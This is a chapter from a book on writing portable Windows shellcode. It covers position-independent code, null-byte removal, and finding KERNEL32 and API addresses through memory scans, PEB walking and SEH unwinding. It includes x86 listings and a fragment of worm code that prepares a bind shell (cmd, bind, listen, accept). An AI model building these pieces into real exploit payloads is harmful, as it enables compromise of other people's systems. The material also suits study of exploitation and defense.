
Chapter 11: The Technique of Writing Portable Shell Code


Shell code never knows beforehand where it will land; therefore, it must be capable of
surviving under any conditions, automatically adapting to the specific operating system. This
is not an easy task, and most hackers were defeated because they paid insufficient attention
to this issue. The few survivors of these invisible battles have given cyberspace the
information that was badly needed by dozens of worms, viruses, and their creators.
Recently, the topic of portable shell code has become extremely popular in the hacker
community. Some hackers are delighted by it, while others sniff scornfully. Portable software
is software that is fully abstracted from the design features of specific hardware and
software. For example, the printf function can successfully output the "hello, world!" string
both to the monitor and to the teletype. Therefore, it is portable. Note, however, that it is
the function that is portable, not its implementation. The monitor and the teletype are served
by different code, which is chosen when the application is compiled and linked.
Shell code is machine code closely tied to specific features of the target system.
Therefore, it cannot be portable by definition. There are no shell code compilers, because
there are no adequate languages to describe it. This forces hackers to use assembly
language or even machine code, which differ from processor to processor. Even worse, a
"naked" processor is of no interest in isolation from peripheral devices. This is because
shell code must not only add and multiply, but also open and close files, process network
requests, and so on. To achieve this, it must call API functions of the operating system
or the drivers of the appropriate devices. Different operating systems use different calling
conventions, and these conventions are very dissimilar. Thus, it is possible to create shell
code supporting a couple of dozen popular operating systems; however, its size would
exceed all allowable limits, because the length of an overflowing buffer is measured in
tens of bytes.
Thus, shell code is conventionally called portable if it supports a specified family of
operating systems (for example, Windows NT, Windows 2000, and Windows XP). As practice has
shown, this degree of portability is enough for solving most practical tasks. In the long run,
it is much easier to write a dozen highly tailored shell codes than one universal one. Nothing
can be done about this, because portability has a price and, in most cases, is achieved at
the expense of increasing the size of the shell code. Therefore, striving for portability is
justified only in exceptional situations.

Requirements for Portable Shell Code


Portable shell code must be fully relocatable (in other words, it must remain usable
wherever it is located in memory). Additionally, it must use a minimum of system-dependent
auxiliary structures, relying only on the least changeable and best documented ones.
When developing portable shell code, it is unacceptable to rely on the contents of the CPU
registers at the moment of overflow, because their values are, in the general case,
undefined. This approach can be chosen only out of desperation, when the shell code
obstinately refuses to fit within the size (in bytes) allocated to it and the hacker must
improvise, sacrificing portability.
Hackers who want to write portable shell code must forget about cunning tricks (also known
as "hacks") and other types of "aerobatics", including undocumented features. Using these
harms portability without providing any useful effect in exchange. To illustrate, recall an
old anecdote about two programmers. The first one boasts: "My program is a hundred times
more elegant, fast, and compact than yours!" The second programmer reasonably answers: "But
my program works, in contrast to yours." The common opinion that hacking is an art is true,
and no one disputes it. However, it does not particularly apply in this case. Cunning tricks
are available to everyone who has read hacking manuals. However, not everyone is capable of
sending shell code to the server without making it freeze or crash.

Ways of Achieving Portability


The technique of creating relocatable code is closely related to the architecture of the
specific microprocessor. In particular, the x86 line supports the following relative commands:
push/pop, call, and jx. The good old PDP-11 was considerably richer in this respect. Most
pleasantly, it allowed the instruction pointer register to be used in address
expressions, thus considerably simplifying the hacker's task. Unfortunately,
we do not choose processors. It is the processor that chooses us.
The conditional jump commands, jx, are always relative, because the command operand
specifies the difference between the target address and the address of the next command
rather than the target address itself. For this reason, conditional jumps are always
relocatable. Two types of operands are supported: BYTE and WORD/DWORD. Both types are signed,
which means that it is possible to jump both forward and backward (in the latter case, the
operand becomes negative).
Unconditional jump commands, jmp, can be either absolute or relative. Relative commands
start with the EBh opcode (the operand has the BYTE type) or with the E9h opcode (the operand
has the WORD/DWORD type). Absolute unconditional jumps start with EAh, and the operand is
written in the following format: segment:offset. There are also indirect commands that
pass control through a pointer located at an absolute address or in a register. The latter is
the most convenient and can be carried out approximately as follows: mov eax, absolute
address/jmp eax.
The call command, which calls a subroutine, behaves the same way as jmp, except
that it is encoded by different opcodes (E8h takes a relative WORD/DWORD operand, and
FFh /2 is the indirect call). Before passing control to the target address, this command
pushes the return address onto the top of the stack. The return address is the
address of the command directly following the call command.
Provided that the shell code is located in the stack (and, in the case of a local buffer
overflow, it lands exactly there), the hacker can use the ESP register as a base. However, for
this purpose, the current ESP value must be known, and this is not always the case. To
determine the current value of the instruction pointer register, it is enough to issue a
near call command and retrieve the return address using the pop command. Usually, the
code that achieves this goal appears as shown in Listing 11.1.

Listing 11.1. Determining the location of the shell code in memory

00000000: E800000000    call 000000005   ; Push EIP+sizeof(call) onto the stack
00000005: 5D            pop  ebp         ; Now the ebp register contains the current eip

The code provided in Listing 11.1 is not free from zeros, which, as you recall, are not
tolerable in most cases in shell code. Therefore, in order to eliminate them, it is
necessary to redirect the call "backward" (Listing 11.2).

Listing 11.2. Eliminating parasitic zeros from the shell code

00000000: EB04          jmps 000000006   ; short jump to call
00000002: 5D            pop  ebp         ; ebp contains the address next to call
00000003: 90            nop              ; \
00000004: 90            nop              ; +- actual shell code
00000005: 90            nop              ; /
00000006: E8F7FFFFFF    call 000000002   ; push the address of the next command
                                         ; onto the stack
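
The operand bytes in Listings 11.1 and 11.2 can be checked by hand with the rule given earlier: the operand is the signed difference between the target address and the address of the next command. The following is a minimal Python sketch of that arithmetic. The helper name rel_operand is made up for illustration, and the instruction lengths (2 bytes for the short jmp, 5 bytes for the near call) are taken from the byte dumps in the listings.

```python
import struct

def rel_operand(instr_addr, instr_len, target, width):
    """Return the little-endian operand bytes of a relative jump or call.

    The operand is the signed difference between the target address and
    the address of the next instruction (instr_addr + instr_len).
    rel_operand is a hypothetical helper, not part of any library.
    """
    displacement = target - (instr_addr + instr_len)
    fmt = {1: "<b", 4: "<i"}[width]      # signed BYTE or signed DWORD
    return struct.pack(fmt, displacement)

# Listing 11.1: call at 0 (5 bytes long) targeting 5, which gives four zero bytes
print(rel_operand(0x0, 5, 0x5, 4).hex())   # 00000000
# Listing 11.2: short jmp at 0 (2 bytes long) targeting 6
print(rel_operand(0x0, 2, 0x6, 1).hex())   # 04
# Listing 11.2: call at 6 (5 bytes long) targeting 2, a backward call
print(rel_operand(0x6, 5, 0x2, 4).hex())   # f7ffffff
```

The backward call yields a negative displacement (-9), whose two's complement encoding contains no zero bytes, which is exactly why Listing 11.2 is free of them.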

Drawbacks of Hard-Encoding
Nothing can be simpler than calling API functions by absolute addresses. Having chosen a
function (for instance, the GetCurrentThreadId function exported by KERNEL32.DLL), process
the DLL with the DUMPBIN utility supplied with practically any compiler. Having determined
the Relative Virtual Address (RVA) of the required function, add it to the base load address
reported by DUMPBIN. The result is the absolute address of the function.
The complete session of working with the DUMPBIN utility appears as shown in Listing
11.3.

Listing 11.3. Determining the absolute address of the GetCurrentThreadId function by
adding its RVA (76A1h) to the base load address of the module (77E80000h)

>dumpbin.exe /EXPORTS KERNEL32.DLL > KERNEL32.TXT
>type KERNEL32.TXT | MORE
    ordinal hint RVA      name

        270  10D 00007DD2 GetCurrentProcessId
        271  10E 000076AB GetCurrentThread
        272  10F 000076A1 GetCurrentThreadId
        273  110 00017CE2 GetDateFormatA
        274  111 00019E18 GetDateFormatW

>dumpbin.exe /HEADERS KERNEL32.DLL > KERNEL32.TXT
>type KERNEL32.TXT | MORE

OPTIONAL HEADER VALUES
             10B magic #
            5.12 linker version
           5D800 size of code
           56400 size of initialized data
               0 size of uninitialized data
            871D RVA of entry point
            1000 base of code
           5A000 base of data
        77E80000 image base
            1000 section alignment
             200 file alignment
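
The arithmetic behind Listing 11.3 can be spelled out in a few lines. This is a minimal Python sketch that uses only the two numbers from the DUMPBIN output above. The function name absolute_address is made up for illustration, and the result is meaningful only when the module is actually loaded at the image base recorded in its header.

```python
import struct

IMAGE_BASE = 0x77E80000   # "image base" from the /HEADERS output
RVA = 0x000076A1          # RVA of GetCurrentThreadId from the /EXPORTS output

def absolute_address(image_base, rva):
    """Absolute address = base load address + relative virtual address."""
    return image_base + rva

address = absolute_address(IMAGE_BASE, RVA)
print(f"{address:08X}h")                    # 77E876A1h
# x86 stores a 32-bit immediate least significant byte first
print(struct.pack("<I", address).hex())     # a176e877
```

The second line of output is the byte order in which such an address appears as the immediate operand of a mov instruction.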

On my machine, the absolute address of the GetCurrentThreadId function is
77E876A1h; however, in different versions of Windows NT it will certainly be different.
On the other hand, the call to this function easily fits within two lines of code (or
7 bytes), as shown in Listing 11.4.

Listing 11.4. Direct call to the API function by its absolute address

00000000: B8A176E877    mov  eax,077E876A1
00000005: FFD0          call eax

Now try to call the connect function exported by ws2_32.dll. Process ws2_32.dll with
DUMPBIN and… Wait! Who promised that this DLL would be loaded into memory?
Furthermore, even if it happens to be loaded, no one can guarantee that the base
address written in its header matches the actual base load address. After all, DLLs are
numerous, and if this address is already occupied by another module, the operating system
will load the library into another memory region.
Only two DLLs are guaranteed to be present in the address space of any process and
are always loaded at the same addresses¹: KERNEL32.DLL and NTDLL.DLL.
Functions exported by other libraries must be called as shown in Listing 11.5.

Listing 11.5. Pseudocode demonstrating the procedure of calling arbitrary functions

h = LoadLibraryA("ws2_32.DLL");
if (h == 0) __error__;              // LoadLibraryA returns NULL on failure
zzz = GetProcAddress(h, "connect");

Thus, the task of calling an arbitrary function is reduced to finding the addresses of the
LoadLibraryA and GetProcAddress functions.

¹ The base load address of these DLLs is constant for a given OS version.

Direct Search in the Memory
The most universal, portable, and reliable method of determining the addresses of API
functions consists of scanning the address space of the process to find PE signatures and
then parsing the export table.
Set the pointer to C0000000h (the upper boundary of the user space for Windows 2000
Advanced Server and Datacenter Server started with the /3GB boot parameter) or to
80000000h (the upper boundary of the user space for all other systems).
Check that the pointer is readable by calling the IsBadReadPtr function exported by
KERNEL32.DLL, or install a custom SEH handler to prevent a crash (detailed
information on handling structured exceptions was provided in Chapter 5). If the
MZ signature is present, move 3Ch bytes forward and retrieve the e_lfanew double word,
which contains the offset of the PE signature. If this signature is actually detected, then
the base load address of a dynamic module has been found, and it is possible to proceed with
parsing the export table, from which the addresses of the LoadLibraryA and GetProcAddress
functions must be retrieved. Knowing these addresses, it is possible to obtain all the
remaining information. If at least one of the above-mentioned conditions is not met,
decrease the pointer by 10000h and repeat the entire procedure (base load addresses are
always multiples of 10000h; therefore, this technique is legitimate). Pseudocode that
searches for the base addresses of all loaded modules by PE signature is shown in
Listing 11.6.

Listing 11.6. Pseudocode that searches for the base addresses of all loaded
modules by PE signature

BYTE* pBaseAddress = (BYTE*) 0xC0000000; // upper boundary of the user space with /3GB;
                                         // use 0x80000000 on all other systems
while (pBaseAddress) // loop until the pointer reaches zero
{
    // Is the DOS header, up to and including e_lfanew, readable?
    if (!IsBadReadPtr(pBaseAddress, 0x40))
        // Is this MZ?
        if (*(WORD*)pBaseAddress == 0x5A4D)
            // Is the pointer to PE valid?
            if (!IsBadReadPtr(pBaseAddress + (*(DWORD*)(pBaseAddress+0x3C)), 4))
                // Is this PE?
                if (*(DWORD*)(pBaseAddress + (*(DWORD*)(pBaseAddress+0x3C))) == 0x4550)
                    // Proceed with parsing the export table
                    if (n2k_simple_export_walker(pBaseAddress)) break;

    // Test the next 64-KB block
    pBaseAddress -= 0x10000;
}

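
The signature test at the heart of Listing 11.6 can be tried out safely on an ordinary byte buffer. The following is a minimal Python sketch, assuming the buffer holds the first bytes of a module. The names is_pe_image and demo_header are made up for illustration, and demo_header builds a synthetic header rather than a real executable.

```python
import struct

def is_pe_image(buf):
    """Return True if buf starts with an MZ header that points to a PE signature."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":       # the WORD 5A4Dh is the bytes "MZ"
        return False
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)   # offset of the PE signature
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"      # the DWORD 4550h

def demo_header(e_lfanew=0x80):
    """Build a synthetic, minimal header for illustration only (an assumption)."""
    buf = bytearray(e_lfanew + 4)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    return bytes(buf)

print(is_pe_image(demo_header()))      # True
print(is_pe_image(bytes(0x100)))       # False
```

Checking both signatures, and not MZ alone, reduces the chance of mistaking arbitrary data that happens to start with "MZ" for a module header.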
Parsing the export table is carried out approximately as shown in Listing 11.7. This
example was borrowed from the unnamed worm from BlackHat, the complete source code of
which can be found at http://www.blackhat.com.

Listing 11.7. Manually parsing the export table

call here
db "GetProcAddress",0,"LoadLibraryA",0
db "CreateProcessA",0,"ExitProcess",0
db "ws2_32",0,"WSASocketA",0
db "bind",0,"listen",0,"accept",0
db "cmd",0
here:
pop edx
push edx
mov ebx,77F00000h
l1:
cmp dword ptr [ebx],905A4Dh ;/x90ZM
je l2
;db 74h,03h
dec ebx
jmp l1
l2:
mov esi,dword ptr [ebx+3Ch]
add esi,ebx
mov esi,dword ptr [esi+78h]
add esi,ebx
mov edi,dword ptr [esi+20h]
add edi,ebx
mov ecx,dword ptr [esi+14h]
push esi
xor eax,eax
l4:
push edi
push ecx
mov edi,dword ptr [edi]
add edi,ebx
mov esi,edx
xor ecx,ecx
;GetProcAddress
mov cl,0Eh
repe cmps
pop ecx
pop edi
je l3
add edi,4
inc eax
loop l4
jmp ecx
l3:
pop esi
mov edx,dword ptr [esi+24h]
add edx,ebx
shl eax,1
add eax,edx
xor ecx,ecx
mov cx,word ptr [eax]
mov eax,dword ptr [esi+1Ch]
add eax,ebx
shl ecx,2
add eax,ecx
mov edx,dword ptr [eax]
add edx,ebx
pop esi
mov edi,esi
xor ecx,ecx
;Get 3 Addr
mov cl,3
call loadaddr
add esi,0Ch
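
The offsets that Listing 11.7 walks through (3Ch, 78h, 1Ch, 20h, and 24h) are easier to follow in a high-level language. The following is a minimal Python sketch of the same lookup over a byte buffer laid out as a module is in memory, so that an RVA equals an offset into the buffer. The names find_export_rva and build_demo_image are made up for illustration, the image is synthetic, and the 78h offset assumes the 32-bit PE layout.

```python
import struct

def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]

def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]

def cstring(img, off):
    return img[off:img.index(b"\0", off)].decode("ascii")

def find_export_rva(img, wanted):
    """Return the RVA of the export named `wanted`, or None if it is absent."""
    pe = u32(img, 0x3C)              # e_lfanew: offset of the PE signature
    exp = u32(img, pe + 0x78)        # RVA of the export directory (32-bit PE)
    n_names = u32(img, exp + 0x18)   # number of exported names
    funcs = u32(img, exp + 0x1C)     # RVA of the array of function RVAs
    names = u32(img, exp + 0x20)     # RVA of the array of name RVAs
    ords = u32(img, exp + 0x24)      # RVA of the array of 16-bit indexes
    for i in range(n_names):
        if cstring(img, u32(img, names + 4 * i)) == wanted:
            index = u16(img, ords + 2 * i)      # name i maps to this slot
            return u32(img, funcs + 4 * index)
    return None

def build_demo_image():
    """Synthetic image with two made-up exports, for illustration only."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<I", img, 0x80 + 0x78, 0x200)       # export directory RVA
    struct.pack_into("<II", img, 0x200 + 0x14, 2, 2)      # function and name counts
    struct.pack_into("<III", img, 0x200 + 0x1C, 0x240, 0x250, 0x260)
    struct.pack_into("<II", img, 0x240, 0x1111, 0x2222)   # function RVAs
    struct.pack_into("<II", img, 0x250, 0x280, 0x290)     # name RVAs
    struct.pack_into("<HH", img, 0x260, 1, 0)             # name i -> function slot
    img[0x280:0x286] = b"Alpha\0"
    img[0x290:0x295] = b"Beta\0"
    return bytes(img)

image = build_demo_image()
print(hex(find_export_rva(image, "Alpha")))   # 0x2222
print(find_export_rva(image, "Gamma"))        # None
```

The name array and the function array are linked only through the array of 16-bit indexes, which is why the listing doubles the name index (shl eax,1) before reading a word and then multiplies that word by four (shl ecx,2).
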
The main drawback of this method is its bulkiness. Recall that the maximum
allowed size of shell code is limited. Unfortunately, nothing better has been
invented so far. The search for the base address can also be optimized, and the
next few sections demonstrate how. However, parsing the export table cannot be
avoided. This is the inevitable price of the shell code's mobility.

Over Open Sights – PEB


PEB analysis is the most popular of all the methods of determining the base load address.
As you recall, the Process Environment Block (PEB) is an auxiliary data structure that,
along with other useful information, contains the base addresses of all loaded modules.
This popularity is undeserved and cannot be explained. After all, the PEB belongs to the
internals of the Windows NT-like operating systems, for which neither documentation nor
include files are available. Only Microsoft Kernel Debugger reveals odds and ends of
information. This lack of documentation makes hackers prick up their ears. Because the PEB is
undocumented, its structure can change in any future Windows version. In fact, this
has already happened multiple times. If it happens again, the example shown in Listing
11.8 will cease to work (and, by the way, it works only under the Windows NT line and
doesn't work under Windows 9x).
So think carefully about whether you really need the PEB. The only advantage that it
provides is extremely compact code.

Listing 11.8. Determining the base address of KERNEL32.DLL by means of analyzing PEB

00000000: 33C0      xor eax,eax            ; eax := 0
00000002: B030      mov al,030             ; eax := 30h
00000004: 648B00    mov eax,fs:[eax]       ; PEB base
00000007: 8B400C    mov eax, [eax][0000C]  ; PEB_LDR_DATA
0000000A: 8B401C    mov eax, [eax][0001C]  ; First element of InInitOrderModuleList
0000000D: AD        lodsd                  ; next element
0000000E: 8B4008    mov eax, [eax][00008]  ; next address KERNEL32.DLL

Unwinding the SEH Stack


The SEH handler assigned by the operating system by default points to the
KERNEL32!_except_handler3 function. By determining its address, it is possible to determine
the position of a cell that is guaranteed to belong to the KERNEL32.DLL module,
after which it only remains to round it down to a multiple of 10000h and then
proceed with searching for the PE signature as described in the "Direct Search in the Memory"
section, with the only difference being that there is no need to check the availability of
the pointer before accessing it (because now the pointer is certainly available).
Practically all applications use custom SEH handlers. Therefore, the current handler doesn't
coincide with the handler assigned by the operating system. The shell code must unwind
the chain of handlers until it reaches the end. The last element of the list will contain the
address of KERNEL32!_except_handler3.
The advantage of this technique is that it uses only documented properties of the
operating system and therefore works on all operating systems of the Windows family,
except for Windows 3.x, where everything is different. Furthermore, it is quite compact.
An example illustrating how to determine the base address of KERNEL32.DLL using SEH
is shown in Listing 11.9.

Listing 11.9. Determining base address of KERNEL32.DLL via SEH. The base address is
returned in the EAX register

00000000: 6764A10000      mov eax,fs:[00000]   ; current EXCEPTION_REGISTRATION
00000005: 40              inc eax              ; if eax was -1, it will be 0
00000006: 48              dec eax              ; rollback to the previous pointer
00000007: 8BF0            mov esi,eax          ; esi to EXCEPTION_REGISTRATION
00000009: 8B00            mov eax,[eax]        ; EXCEPTION_REGISTRATION.prev
0000000B: 40              inc eax              ; if eax was -1, it will be 0
0000000C: 75F8            jne 000000006        ; if nonzero, unwind further
0000000E: AD              lodsd                ; skip prev
0000000F: AD              lodsd                ; retrieve handler
00000010: 6633C0          xor ax,ax            ; align by 64 KB
00000013: EB05            jmps 00000001A       ; jump into the loop body
00000015: 2D00000100      sub eax,000010000    ; go 64 KB down
0000001A: 6681384D5A      cmp w,[eax],05A4D    ; is this MZ?
0000001F: 75F4            jne 000000015        ; if not MZ, continue unwinding
00000021: 8B583C          mov ebx,[eax+3Ch]    ; retrieve the pointer to PE
00000024: 813C1850450000  cmp [eax+ebx],4550h  ; is this PE?
0000002B: 75E8            jne 000000015        ; if not PE, continue unwinding
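
The rounding and the downward search in the second half of Listing 11.9 can be modeled without touching real memory. The following is a minimal Python sketch over a simulated address space. The names align_down_64k, find_module_base, and fake_memory are made up for illustration, the handler address is invented, and the sketch checks only the MZ signature.

```python
def align_down_64k(address):
    """Clear the low 16 bits, as `xor ax,ax` does in Listing 11.9."""
    return address & 0xFFFF0000

def find_module_base(address, read_word):
    """Step down in 64 KB blocks until read_word(base) returns the MZ signature.

    read_word is a hypothetical callback that returns the 16-bit value stored
    at an address; here it stands in for a real memory read.
    """
    base = align_down_64k(address)
    while base and read_word(base) != 0x5A4D:
        base -= 0x10000
    return base

# Simulated memory: a module whose MZ header sits at 77E80000h
fake_memory = {0x77E80000: 0x5A4D}
handler = 0x77EA1856          # made-up address of a handler inside the module
base = find_module_base(handler, lambda a: fake_memory.get(a, 0))
print(f"{base:08X}h")         # 77E80000h
```

Because base load addresses are multiples of 10000h, the search needs to inspect only one address per 64 KB block, which keeps the loop short.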

Native API
The use of the "naked" Native API (also known as the raw API) is considered a kind of hacking
"aerobatics". In fact, this reputation is not deserved. On the contrary, resorting to such
perversions without a reason is a sign of an amateurish approach. This is not only because
Native API functions are undocumented and subject to constant changes, but also because they
are unsuitable for direct use (that's why they are called "raw"). Actually, these functions
are "half-products" that implement low-level primitives, a kind of building blocks, which
require a large amount of "coupling" code. Individual examples of such code
can be found in NTDLL.DLL and KERNEL32.DLL.
In Windows NT, access to native API functions is carried out through the int 2Eh
interrupt. The function number is loaded into the EAX register, and the address of the
parameter block with the arguments is loaded into the EDX register. In Windows XP, the
sysenter machine command is used for the same purpose; however, the main properties of
int 2Eh have been fully preserved (at least for the moment).
The most interesting native API functions used in shell code are listed in Listing 11.10.

Listing 11.10. Main Native API functions

000h AcceptConnectPort (24 bytes of parameters)
00Ah AllocateVirtualMemory (24 bytes of parameters)
012h ConnectPort (32 bytes of parameters)
017h CreateFile (44 bytes of parameters)
019h CreateKey (28 bytes of parameters)
01Ch CreateNamedPipeFile (56 bytes of parameters)
01Eh CreatePort (20 bytes of parameters)
01Fh CreateProcess (32 bytes of parameters)
024h CreateThread (32 bytes of parameters)
029h DeleteFile (4 bytes of parameters)
02Ah DeleteKey (4 bytes of parameters)
02Ch DeleteValueKey (8 bytes of parameters)
02Dh DeviceIoControlFile (40 bytes of parameters)
03Ah FreeVirtualMemory (16 bytes of parameters)
03Ch GetContextThread (8 bytes of parameters)
049h MapViewOfSection (40 bytes of parameters)
04Fh OpenFile (24 bytes of parameters)
051h OpenKey (12 bytes of parameters)
054h OpenProcess (16 bytes of parameters)
059h OpenThread (16 bytes of parameters)
067h QueryEaFile (36 bytes of parameters)
086h ReadFile (36 bytes of parameters)
089h ReadVirtualMemory (20 bytes of parameters)
08Fh ReplyPort (8 bytes of parameters)
092h RequestPort (8 bytes of parameters)
096h ResumeThread (8 bytes of parameters)
09Ch SetEaFile (16 bytes of parameters)
0B3h SetValueKey (24 bytes of parameters)
0B5h ShutdownSystem (4 bytes of parameters)
0BAh SystemDebugControl (24 bytes of parameters)
0BBh TerminateProcess (8 bytes of parameters)
0BCh TerminateThread (8 bytes of parameters)
0C2h UnmapViewOfSection (8 bytes of parameters)
0C3h VdmControl (8 bytes of parameters)
0C8h WriteFile (36 bytes of parameters)
0CBh WriteVirtualMemory (20 bytes of parameters)
0CCh W32Call (20 bytes of parameters)

Comparison of Different Methods of Ensuring Portability


Table 11.1 compares the different methods of searching for the addresses of API
functions. The best method, SEH unwinding, is the only one rated "Yes" in every column.

Table 11.1. Comparative information about different methods of searching for addresses of API
functions

                 Supported platform                      Convenience of
Method           NT/2000/XP    9x           Portability  implementation

Hard-encoding    Yes           Yes          No           Yes
Memory search    Yes           Yes          Yes          No
PEB analysis     Yes           No           Partially    Yes
SEH unwinding    Yes           Yes          Yes          Yes
Native API       Yes           Partially²   No           No

² Naturally, Windows 9x also has a native API; however, it differs from the native API of
Windows NT/2000/XP.
